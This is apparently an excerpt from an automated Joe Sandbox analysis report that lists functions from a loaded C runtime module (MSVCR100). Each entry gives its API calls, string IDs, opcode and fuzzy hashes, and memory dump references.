                                                                                                          • Opcode Fuzzy Hash: 339766c4a845259cf0957da36fb5894242d679fe679fa732184e63be4be5ff8d
                                                                                                          • Instruction Fuzzy Hash: E442D7B1940718DBC761AFB8CC89A9EB7F8AF45314F10475AE465D72C0DB34F6848BA2
                                                                                                          Function 6FDEE7F1 Relevance: 102.6, APIs: 37, Strings: 21, Instructions: 1110COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDEE857
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDEE862
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • iswctype.MSVCR100(00000000,00000008,?,?), ref: 6FDEE8AC
                                                                                                          • iswctype.MSVCR100(00000000,00000008,?,?), ref: 6FDEE8E9
                                                                                                          • isdigit.MSVCR100(00000000,?,?), ref: 6FDEE97C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswctype$_errno_invalid_parameter_invalid_parameter_noinfoisdigit
                                                                                                          • String ID: *$F$F$I$L$N$c$c$c$c$g$h$i$l$n$n$o$s$w${${
                                                                                                          • API String ID: 4126605999-2618222358
                                                                                                          • Opcode ID: b9db0cb822d72baa20d5afc4a90692ecd5085a23562b518a45f640b3a1af82f2
                                                                                                          • Instruction ID: 1ceca84f80cfe91d5043a8ce0b46e4b62a2a2bf6d174936d686ce51a6e5314c1
                                                                                                          • Opcode Fuzzy Hash: b9db0cb822d72baa20d5afc4a90692ecd5085a23562b518a45f640b3a1af82f2
                                                                                                          • Instruction Fuzzy Hash: EE92AC75D0536ACAEBA59B24DC88BEDB7B4AF05314F1001EBD458AA1A1DB70BEC1CF50
                                                                                                          Function 6FDCA277 Relevance: 98.2, APIs: 38, Strings: 18, Instructions: 204libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsCompletionList,00000000,00000114,00000000,?,?,?,?,6FDBBE65), ref: 6FDCA293
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA29C
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,6FDBBE65), ref: 6FDCA2A2
                                                                                                          • ??0scheduler_resource_allocation_error@Concurrency@@QAE@J@Z.MSVCR100(00000000,?,?,?,?,6FDBBE65), ref: 6FDCA2BA
                                                                                                          • _CxxThrowException.MSVCR100(?,6FE20C48,00000000,?,?,?,?,6FDBBE65), ref: 6FDCA2C8
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,DequeueUmsCompletionListItems,?,?,?,?,6FDBBE65), ref: 6FDCA2E1
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA2E4
                                                                                                          • GetLastError.KERNEL32(?,?,?,?,6FDBBE65), ref: 6FDCA2EA
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetUmsCompletionListEvent,?,?,?,?,6FDBBE65), ref: 6FDCA30A
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA30D
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,ExecuteUmsThread,?,?,?,?,6FDBBE65), ref: 6FDCA327
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA32A
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,UmsThreadYield,?,?,?,?,6FDBBE65), ref: 6FDCA344
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA347
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsCompletionList,?,?,?,?,6FDBBE65), ref: 6FDCA361
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA364
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetCurrentUmsThread,?,?,?,?,6FDBBE65), ref: 6FDCA37E
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA381
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetNextUmsListItem,?,?,?,?,6FDBBE65), ref: 6FDCA39F
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA3A2
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,QueryUmsThreadInformation,?,?,?,?,6FDBBE65), ref: 6FDCA3C0
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA3C3
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,SetUmsThreadInformation,?,?,?,?,6FDBBE65), ref: 6FDCA3E1
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA3E4
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteUmsThreadContext,?,?,?,?,6FDBBE65), ref: 6FDCA402
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA405
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,CreateUmsThreadContext,?,?,?,?,6FDBBE65), ref: 6FDCA423
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA426
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,EnterUmsSchedulingMode,?,?,?,?,6FDBBE65), ref: 6FDCA444
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA447
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,CreateRemoteThreadEx,?,?,?,?,6FDBBE65), ref: 6FDCA465
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA468
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,InitializeProcThreadAttributeList,?,?,?,?,6FDBBE65), ref: 6FDCA486
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA489
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,UpdateProcThreadAttribute,?,?,?,?,6FDBBE65), ref: 6FDCA4A7
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA4AA
                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,DeleteProcThreadAttributeList,?,?,?,?,6FDBBE65), ref: 6FDCA4C8
                                                                                                          • GetProcAddress.KERNEL32(00000000), ref: 6FDCA4CB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressHandleModuleProc$ErrorLast$??0scheduler_resource_allocation_error@Concurrency@@ExceptionThrow
                                                                                                          • String ID: CreateRemoteThreadEx$CreateUmsCompletionList$CreateUmsThreadContext$DeleteProcThreadAttributeList$DeleteUmsCompletionList$DeleteUmsThreadContext$DequeueUmsCompletionListItems$EnterUmsSchedulingMode$ExecuteUmsThread$GetCurrentUmsThread$GetNextUmsListItem$GetUmsCompletionListEvent$InitializeProcThreadAttributeList$QueryUmsThreadInformation$SetUmsThreadInformation$UmsThreadYield$UpdateProcThreadAttribute$kernel32.dll
                                                                                                          • API String ID: 2974244316-2643937717
                                                                                                          • Opcode ID: 6ffc074b08dc1ee2051f3eebbefcdbcdb2020ca09c98777fa3d4f96909c0a883
                                                                                                          • Instruction ID: 49aabd4212e51217f97844d13c5130f95041dbb44d9601b680889466300fd5ac
                                                                                                          • Opcode Fuzzy Hash: 6ffc074b08dc1ee2051f3eebbefcdbcdb2020ca09c98777fa3d4f96909c0a883
                                                                                                          • Instruction Fuzzy Hash: 62517AF16007199AAF94ABB98C75C7B7E9DEB47261310452BE406C3144FE39F851DF22
                                                                                                          Function 6FD83DB1 Relevance: 88.7, APIs: 41, Strings: 9, Instructions: 1186COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • iswctype.MSVCR100(00000000,00000008,?,?), ref: 6FD83E5A
                                                                                                          • isdigit.MSVCR100(00000000,?,?), ref: 6FD83EF7
                                                                                                            • Part of subcall function 6FD821CC: _isdigit_l.MSVCR100(?,00000000), ref: 6FD821E3
                                                                                                          • isdigit.MSVCR100(0000002B,?,?), ref: 6FD84093
                                                                                                          • _fgetwc_nolock.MSVCR100(?,?,?), ref: 6FD840DB
                                                                                                          • _fgetwc_nolock.MSVCR100(?,?,?), ref: 6FD8435E
                                                                                                          • _errno.MSVCR100 ref: 6FDAB962
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDAB96D
                                                                                                          • iswctype.MSVCR100(00000000,00000008,?,?), ref: 6FDAB9B2
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _fgetwc_nolockisdigitiswctype$_errno_invalid_parameter_noinfo_isdigit_l
                                                                                                          • String ID: *$F$I$L$N$h$l$o$w
                                                                                                          • API String ID: 2196123123-3522493044
                                                                                                          • Opcode ID: 0c91233596b30c7e71b4d50b987b288557a63b80ee7ede61ba196039b3c45417
                                                                                                          • Instruction ID: a0bf4b1d422c3b00d669b0f2cc1795463561d42ca3e12811b96b69e816ba70ed
                                                                                                          • Opcode Fuzzy Hash: 0c91233596b30c7e71b4d50b987b288557a63b80ee7ede61ba196039b3c45417
                                                                                                          • Instruction Fuzzy Hash: A6A26E75D44369CADBA18B28CC88BEDB7B8AF06314F1001DBD4A9A6191DB71BEC1CF54
                                                                                                          Function 6FDE22CD Relevance: 83.2, APIs: 35, Strings: 12, Instructions: 912COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDE231D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDE2328
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • isspace.MSVCR100(?,?,?), ref: 6FDE2367
                                                                                                          • isspace.MSVCR100(00000000,?,?), ref: 6FDE238E
                                                                                                          • isdigit.MSVCR100(00000000,?,?), ref: 6FDE240C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: isspace$_errno_invalid_parameter_invalid_parameter_noinfoisdigit
                                                                                                          • String ID: $*$8$?$F$F$I$L$N$h$l$w
                                                                                                          • API String ID: 3351369290-344177605
                                                                                                          • Opcode ID: 8af133c1dfc2f3857417520f7fc0a8cbeda78074d8eea2543b59604cb2544bb4
                                                                                                          • Instruction ID: fb2a86f5114ce5cfa3ad428a9d5117bebb50026d749f426e131e3aac4f374153
                                                                                                          • Opcode Fuzzy Hash: 8af133c1dfc2f3857417520f7fc0a8cbeda78074d8eea2543b59604cb2544bb4
                                                                                                          • Instruction Fuzzy Hash: F8827C71D4836ADEDFA28B24CC517E9BBB5AF0630AF1401DAC598A6191CB307EC5CF61
                                                                                                          Function 6FDE4159 Relevance: 81.5, APIs: 37, Strings: 9, Instructions: 1024COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100 ref: 6FDE41AF
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDE41BA
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • iswctype.MSVCR100(00000000,00000008,?,?), ref: 6FDE41FA
                                                                                                          • iswctype.MSVCR100(00000000,00000008,?,?), ref: 6FDE4229
                                                                                                          • isdigit.MSVCR100(00000000,?,?), ref: 6FDE42B7
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: iswctype$_errno_invalid_parameter_invalid_parameter_noinfoisdigit
                                                                                                          • String ID: *$F$F$I$L$N$h$l$w
                                                                                                          • API String ID: 4126605999-4069441466
                                                                                                          • Opcode ID: 59fae721f1fe36c5f56f24d18574322d12028bfebbc0d41da64bae8055930b2f
                                                                                                          • Instruction ID: aa181308fe70cf7cf2ac9bfa45d9a7a95fcf087e2c7e8104037a38106e615650
                                                                                                          • Opcode Fuzzy Hash: 59fae721f1fe36c5f56f24d18574322d12028bfebbc0d41da64bae8055930b2f
                                                                                                          • Instruction Fuzzy Hash: 39927A79C453AACADBA19B24CC88BEDB6B4BF06314F1041EBD458AA191D774BEC1CF50
                                                                                                          Function 6FDE6E18 Relevance: 51.9, APIs: 20, Strings: 9, Instructions: 1148stringCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • _errno.MSVCR100(?), ref: 6FDE6E76
                                                                                                          • _errno.MSVCR100(?), ref: 6FDE6E85
                                                                                                          • _isleadbyte_l.MSVCR100(?,?,?,?), ref: 6FDE739D
                                                                                                          • _invalid_parameter_noinfo.MSVCR100(?), ref: 6FDE6E90
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • strtol.MSVCR100(?,?,0000000A,?,?), ref: 6FDE6F9C
                                                                                                          • memset.MSVCR100(?,00000000,00000640,?), ref: 6FDE6FCA
                                                                                                          • strtol.MSVCR100(?,?,0000000A,?,?), ref: 6FDE6FF5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _errnostrtol$_invalid_parameter_invalid_parameter_noinfo_isleadbyte_lmemset
                                                                                                          • String ID: $'$*$@$c$g$h$l$w
                                                                                                          • API String ID: 1292866728-3540947701
                                                                                                          • Opcode ID: e2b9bb2f872431fd23ce85e89872c40d04c6f39ddfc7195ccd7ed39c3e5c54a1
                                                                                                          • Instruction ID: 1a7907923aa495af14b83d3617161be36c0b3043afa0f704eafc73d5c64e03fe
                                                                                                          • Opcode Fuzzy Hash: e2b9bb2f872431fd23ce85e89872c40d04c6f39ddfc7195ccd7ed39c3e5c54a1
                                                                                                          • Instruction Fuzzy Hash: EEB26970904769EADBE18B28CD40799B7F1FF02315F1482DAD4E8A6292DB317AC5CF90
                                                                                                          Function 6FDD0B33 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 316COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD0B5D
                                                                                                          • _errno.MSVCR100 ref: 6FDD0B64
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD0B6F
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcspbrk.MSVCR100(?,6FD977E4), ref: 6FDD0B83
                                                                                                          • _errno.MSVCR100 ref: 6FDD0B8E
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD0B98
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfowcspbrk
                                                                                                          • String ID: ./\
                                                                                                          • API String ID: 4245593769-3176372042
                                                                                                          • Opcode ID: 28ce5cf4a1244a4d88efe3162285291f5779220a85bb63d7651b60018ebfcef9
                                                                                                          • Instruction ID: 0c0ae1d2090c4a51842ad2f5f6c4b7fc64d9b2b1e9519c997e9919215e4db9ec
                                                                                                          • Opcode Fuzzy Hash: 28ce5cf4a1244a4d88efe3162285291f5779220a85bb63d7651b60018ebfcef9
                                                                                                          • Instruction Fuzzy Hash: B4C196B1805729EEDB609F74CC48AEAB7B8BF48354F00129AF65CD2584E734B990CF65
                                                                                                          Function 6FDD0F84 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 302COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD0FAE
                                                                                                          • _errno.MSVCR100 ref: 6FDD0FB5
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD0FC0
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcspbrk.MSVCR100(?,6FD977E4), ref: 6FDD0FD4
                                                                                                          • _errno.MSVCR100 ref: 6FDD0FDF
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD0FE9
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfowcspbrk
                                                                                                          • String ID: ./\
                                                                                                          • API String ID: 4245593769-3176372042
                                                                                                          • Opcode ID: e76fd3660e6b041611c0f65850c9f99f89e51476d3e0711d3646b1969fff3809
                                                                                                          • Instruction ID: d7a5ccad1c58d75bb0b5ba45c61e921a0e63d82b60230282496e9ec74401a3fd
                                                                                                          • Opcode Fuzzy Hash: e76fd3660e6b041611c0f65850c9f99f89e51476d3e0711d3646b1969fff3809
                                                                                                          • Instruction Fuzzy Hash: 4EB175B1844629EAEB609F758C48BEAB7BCFF05314F00029AF65CD6180E735B984DF65
                                                                                                          Function 6FDD0702 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 302COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD0732
                                                                                                          • _errno.MSVCR100 ref: 6FDD0739
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDD0744
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • wcspbrk.MSVCR100(?,6FD977E4), ref: 6FDD0758
                                                                                                          • _errno.MSVCR100 ref: 6FDD0763
                                                                                                          • __doserrno.MSVCR100 ref: 6FDD076D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfowcspbrk
                                                                                                          • String ID: ./\
                                                                                                          • API String ID: 4245593769-3176372042
                                                                                                          • Opcode ID: 297b13da6859b6ed35cfa3c271b7970a114eaa0c72c3a281da5975e11ac4fc08
                                                                                                          • Instruction ID: 5a04d4df2c4a2fa8c782019a6274fbbd02b29ccd95320df5bf539c2e4b5662d4
                                                                                                          • Opcode Fuzzy Hash: 297b13da6859b6ed35cfa3c271b7970a114eaa0c72c3a281da5975e11ac4fc08
                                                                                                          • Instruction Fuzzy Hash: F1B1A6B1845728EADBA09F648C48BE9B7B8BF45354F00129AF65CD6184E734BAC0CF65
                                                                                                          Function 6FDCEFE1 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 301COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDCF011
                                                                                                          • _errno.MSVCR100 ref: 6FDCF018
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCF023
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _mbspbrk.MSVCR100(?,6FDB301C), ref: 6FDCF037
                                                                                                          • _errno.MSVCR100 ref: 6FDCF042
                                                                                                          • __doserrno.MSVCR100 ref: 6FDCF04C
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613238351.000000006FE29000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_9_2_6fd70000__kjfech8_Vi7.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: __doserrno_errno$_invalid_parameter_invalid_parameter_noinfo_mbspbrk
                                                                                                          • String ID: ./\
                                                                                                          • API String ID: 790986403-3176372042
                                                                                                          • Opcode ID: 13bda6ac4057a1ee84accbb15f1927334142bcbe5157a7cfc678d703ac46c598
                                                                                                          • Instruction ID: 3ce6ef28e4dea579471c6acfef308592ef3d0711624f9a5652366bf0081b9de3
                                                                                                          • Opcode Fuzzy Hash: 13bda6ac4057a1ee84accbb15f1927334142bcbe5157a7cfc678d703ac46c598
                                                                                                          • Instruction Fuzzy Hash: A8B17FB1804729EADBA09F658C48BE9B7BCAF05715F10429AF558E7180E734BAC0DF71
                                                                                                          Function 6FDCFD86 Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 301COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • __doserrno.MSVCR100 ref: 6FDCFDB0
                                                                                                          • _errno.MSVCR100 ref: 6FDCFDB7
                                                                                                          • _invalid_parameter_noinfo.MSVCR100 ref: 6FDCFDC2
                                                                                                            • Part of subcall function 6FDFAF7E: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6FDCB6CF,?,6FDCC24B,00000003,6FDA74A4,6FD8A948,0000000C,6FDA74F7,00000001,00000001), ref: 6FDFAF85
                                                                                                          • _mbspbrk.MSVCR100(?,6FDB301C), ref: 6FDCFDD6
                                                                                                          • _errno.MSVCR100 ref: 6FDCFDE1
                                                                                                          • __doserrno.MSVCR100 ref: 6FDCFDEB
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000009.00000002.30612817331.000000006FD71000.00000020.00000001.01000000.00000009.sdmp, Offset: 6FD70000, based on PE: true
                                                                                                          • Associated: 00000009.00000002.30612734015.000000006FD70000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613074314.000000006FE24000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                          • Associated: 00000009.00000002.30613163038.000000006FE25000.00000008.00000001.01000000.00000009.sdmpDownload File
